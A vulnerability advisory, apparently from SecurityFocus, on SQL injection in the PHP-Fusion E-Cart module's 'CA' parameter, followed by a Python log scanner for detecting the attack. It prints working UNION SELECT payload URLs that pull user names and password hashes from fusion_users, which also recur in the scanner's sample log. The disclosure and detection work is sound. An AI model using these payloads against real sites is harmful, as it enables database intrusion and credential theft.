PHP-Fusion E-Cart Module 'CA' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/[path]/infusions/e_cart/items.php?CA=-9999'%20union%20select%20user_name,1,2%20from%20fusion_users/*
http://www.example.com/[path]/infusions/e_cart/items.php?CA=-9999'%20union%20select%20user_password,1,2%20from%20fusion_users/*
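
For defenders reviewing web server logs, the following is an added example (not part of the original advisory and not PHP-Fusion code) that flags requests to the affected script whose decoded CA value is not a plain integer. It assumes that legitimate CA values are non-negative integer ids and that logs use the combined access-log format; the log lines, the /shop/ install path and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path of the affected script, as given in the advisory's example URIs.
TARGET = re.compile(r"/infusions/e_cart/items\.php$", re.IGNORECASE)
# Assumption: a legitimate CA value is a plain non-negative integer id.
VALID_CA = re.compile(r"\d+")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_ca(url):
    """Return the decoded CA value if it is not a plain integer, else None."""
    parts = urlsplit(url)
    if not TARGET.search(parts.path):
        return None
    # parse_qs percent-decodes values, so %27 and ' are treated alike.
    for value in parse_qs(parts.query).get("CA", []):
        if not VALID_CA.fullmatch(value):
            return value
    return None

def scan_log(lines):
    """Return (line_number, decoded_CA) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            value = suspicious_ca(match.group(1))
            if value is not None:
                hits.append((number, value))
    return hits

# Constructed sample log; lines 2 and 3 carry the advisory's example strings,
# the third in a percent-encoded form to show why decoding comes first.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /shop/infusions/e_cart/items.php?CA=3 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2010:10:00:05 +0000] "GET /shop/infusions/e_cart/items.php?CA=-9999\'%20union%20select%20user_name,1,2%20from%20fusion_users/* HTTP/1.1" 200 734',
    '192.0.2.44 - - [01/Jan/2010:10:00:09 +0000] "GET /shop/infusions/e_cart/items.php?CA=-9999%27+UNION+SELECT+user_password,1,2+FROM+fusion_users%2F%2A HTTP/1.1" 200 812',
    '192.0.2.10 - - [01/Jan/2010:10:00:12 +0000] "GET /shop/news.php?CA=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value in scan_log(SAMPLE_LOG):
        print(f"line {number}: non-numeric CA value: {value!r}")
```

The same integer-only rule is what the application should enforce on CA before the value reaches a query, ideally together with a parameterized statement.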


 

Copyright 2010, SecurityFocus